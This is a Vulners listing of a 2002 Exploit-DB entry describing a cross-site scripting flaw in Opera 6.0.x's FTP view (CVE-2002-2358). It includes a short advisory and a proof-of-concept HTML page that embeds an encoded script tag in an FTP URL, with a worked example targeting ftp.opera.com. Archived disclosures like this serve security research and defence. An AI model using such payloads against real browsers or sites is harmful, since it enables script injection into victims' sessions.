Lucene search
+L

Opera 6.0.x - FTP View Cross-Site Scripting

🗓️ 06 Aug 2002 00:00:00Reported by Eiji James YoshidaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

Vulnerability in Opera allows cross-site scripting via unsanitized FTP site titles.

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2002-2358
29 Oct 200719:00
cve
Cvelist
CVE-2002-2358
29 Oct 200719:00
cvelist
EUVD
EUVD-2002-2336
7 Oct 202500:30
euvd
NVD
CVE-2002-2358
31 Dec 200205:00
nvd
RedhatCVE
CVE-2002-2358
21 May 202520:39
redhatcve
source: https://www.securityfocus.com/bid/5401/info

A cross-site scripting vulnerability in Opera has been reported. When viewing the contents of an FTP site as web content, the data within <title> tags is not sanitized. An attacker may embed javascript between open and closing <title> tags in a FTP URL.

This vulnerability has been confirmed on Opera 6.03 and 6.04 for Windows 2000.

<html>
<head>
<META http-equiv="Refresh" content="5 ;
url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@[FTPserver]/">
</head>
<body>
<script>window.open("ftp://[FTPserver]/");</script>
</body>
</html>

Example:
<html>
<head>
<META http-equiv="Refresh" content="5 ;
url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%[email protected]/">
</head>
<body>
<script>window.open("ftp://ftp.opera.com/");</script>
</body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Oct 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.01709
28